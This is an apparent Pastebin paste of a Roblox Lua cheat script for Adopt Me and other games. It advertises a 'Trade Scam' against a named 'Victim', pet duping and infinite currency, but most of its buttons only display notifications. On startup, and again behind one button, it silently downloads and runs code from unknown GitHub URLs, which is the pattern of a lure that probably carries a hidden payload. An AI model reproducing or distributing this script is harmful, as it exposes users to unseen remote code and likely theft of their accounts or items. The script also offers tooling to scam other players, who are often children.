Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
- OrionLib:MakeNotification({
- Name = "Loading The Script..",
- Content = "May Take 20-30 seconds this is not the exact lodaing timeā",
- Image = "rbxassetid://18170549235",
- Time = 20
- })
- loadstring(game:HttpGet("https://raw.githubusercontent.com/UnknownScripter001/AdoptMe/refs/heads/main/Universal%20Dark%20Script.txt"))()
- Wait (0.99)
- local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
- local Window = OrionLib:MakeWindow({Name = "š¦Universal Dark Script", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})
- local Tab = Window:MakeTab({
- Name = "Adopt Me",
- Icon = "rbxassetid://4483345998",
- PremiumOnly = false
- })
- --[[
- Name = <string> - The name of the tab.
- Icon = <string> - The icon of the tab.
- PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
- ]]
- local Section = Tab:AddSection({
- Name = "Trade Scam"
- })
- --[[
- Name = <string> - The name of the section.
- ]]
- Tab:AddTextbox({
- Name = "Player Name (Victim)",
- Default = "Roblox",
- TextDisappear = false,
- Callback = function(Value)
- OrionLib:MakeNotification({
- Name = "Player Selected!",
- Content = "You can now control your victim",
- Image = "rbxassetid://4483345998",
- Time = 5
- })
- --[[
- Title = <string> - The title of the notification.
- Content = <string> - The content of the notification.
- Image = <string> - The icon of the notification.
- Time = <number> - The duration of the notfication.
- ]]
- end
- })
- --[[
- Name = <string> - The name of the textbox.
- Default = <string> - The default value of the textbox.
- TextDisappear = <bool> - Makes the text disappear in the textbox after losing focus.
- Callback = <function> - The function of the textbox.
- ]]
- Tab:AddButton({
- Name = "Make yourself freeze offer",
- Callback = function()
- OrionLib:MakeNotification({
- Name = "Freeze Successful!",
- Content = "You can now remove your pets",
- Image = "rbxassetid://4483345998",
- Time = 5
- })
- --[[
- Title = <string> - The title of the notification.
- Content = <string> - The content of the notification.
- Image = <string> - The icon of the notification.
- Time = <number> - The duration of the notfication.
- ]]
- end
- })
- --[[
- Name = <string> - The name of the button.
- Callback = <function> - The function of the button.
- ]]
- Tab:AddButton({
- Name = "Make Victim Accept/Confirm",
- Callback = function()
- OrionLib:MakeNotification({
- Name = "Script Activated!",
- Content = "Victim Will Auto Accept And Confirm!",
- Image = "rbxassetid://4483345998",
- Time = 5
- })
- --[[
- Title = <string> - The title of the notification.
- Content = <string> - The content of the notification.
- Image = <string> - The icon of the notification.
- Time = <number> - The duration of the notfication.
- ]]
- end
- })
- --[[
- Name = <string> - The name of the button.
- Callback = <function> - The function of the button.
- ]]
- local Section = Tab:AddSection({
- Name = "AutoFarm"
- })
- --[[
- Name = <string> - The name of the section.
- ]]
- Tab:AddToggle({
- Name = "Auto Farm Christmas (Event)",
- Default = false,
- Callback = function(Value)
- print(Value)
- end
- })
- --[[
- Name = <string> - The name of the toggle.
- Default = <bool> - The default value of the toggle.
- Callback = <function> - The function of the toggle.
- ]]
- Tab:AddToggle({
- Name = "Auto Farm Bucks",
- Default = false,
- Callback = function(Value)
- print(Value)
- end
- })
- --[[
- Name = <string> - The name of the toggle.
- Default = <bool> - The default value of the toggle.
- Callback = <function> - The function of the toggle.
- ]]
- local Section = Tab:AddSection({
- Name = "Dupe"
- })
- --[[
- Name = <string> - The name of the section.
- ]]
- Tab:AddButton({
- Name = "Equip a pet you want to dupe",
- Callback = function()
- OrionLib:MakeNotification({
- Name = "Pet Selected!",
- Content = "You can now dupe your pets",
- Image = "rbxassetid://4483345998",
- Time = 5
- })
- --[[
- Title = <string> - The title of the notification.
- Content = <string> - The content of the notification.
- Image = <string> - The icon of the notification.
- Time = <number> - The duration of the notfication.
- ]]
- end
- })
- --[[
- Name = <string> - The name of the button.
- Callback = <function> - The function of the button.
- ]]
- Tab:AddButton({
- Name = "Click to dupe selected pets",
- Callback = function()
- OrionLib:MakeNotification({
- Name = "Dupe Processingā¦..",
- Content = "Kindly wait for 120 second to dupe, you will automatic get kick and it is sign your duping successful ",
- Image = "rbxassetid://4483345998",
- Time = 120
- })
- --[[
- Title = <string> - The title of the notification.
- Content = <string> - The content of the notification.
- Image = <string> - The icon of the notification.
- Time = <number> - The duration of the notfication.
- ]]
- end
- })
- --[[
- Name = <string> - The name of the button.
- Callback = <function> - The function of the button.
- ]]
- local Section = Tab:AddSection({
- Name = "Visual"
- })
- --[[
- Name = <string> - The name of the section.
- ]]
- Tab:AddButton({
- Name = "Make all pets MFR",
- Callback = function()
- loadstring(game:HttpGet("https://raw.githubusercontent.com/lf4d7/daphie/main/ame.lua"))()
- end
- })
- --[[
- Name = <string> - The name of the button.
- Callback = <function> - The function of the button.
- ]]
- Tab:AddButton({
- Name = "Infinite Bucks",
- Callback = function()
- require(game:service'ReplicatedStorage'.Fsys).load("ClientData").update("money",(15999999984/16))
- end
- })
- local Tab = Window:MakeTab({
- Name = "Pet Simulator X",
- Icon = "rbxassetid://4483345998",
- PremiumOnly = false
- })
- --[[
- Name = <string> - The name of the tab.
- Icon = <string> - The icon of the tab.
- PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
- ]]
- local Tab = Window:MakeTab({
- Name = "Pet Simulator 99",
- Icon = "rbxassetid://4483345998",
- PremiumOnly = false
- })
- --[[
- Name = <string> - The name of the tab.
- Icon = <string> - The icon of the tab.
- PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
- ]]
- local Tab = Window:MakeTab({
- Name = "Pet Go",
- Icon = "rbxassetid://4483345998",
- PremiumOnly = false
- })
- --[[
- Name = <string> - The name of the tab.
- Icon = <string> - The icon of the tab.
- PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
- ]]
- local Tab = Window:MakeTab({
- Name = "Blade Ball",
- Icon = "rbxassetid://4483345998",
- PremiumOnly = false
- })
- --[[
- Name = <string> - The name of the tab.
- Icon = <string> - The icon of the tab.
- PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
- ]]
- local Tab = Window:MakeTab({
- Name = "Da Hood",
- Icon = "rbxassetid://4483345998",
- PremiumOnly = false
- })
- --[[
- Name = <string> - The name of the tab.
- Icon = <string> - The icon of the tab.
- PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
- ]]
- local Tab = Window:MakeTab({
- Name = "Murder Mystery 2",
- Icon = "rbxassetid://4483345998",
- PremiumOnly = false
- })
- --[[
- Name = <string> - The name of the tab.
- Icon = <string> - The icon of the tab.
- PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
- ]]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement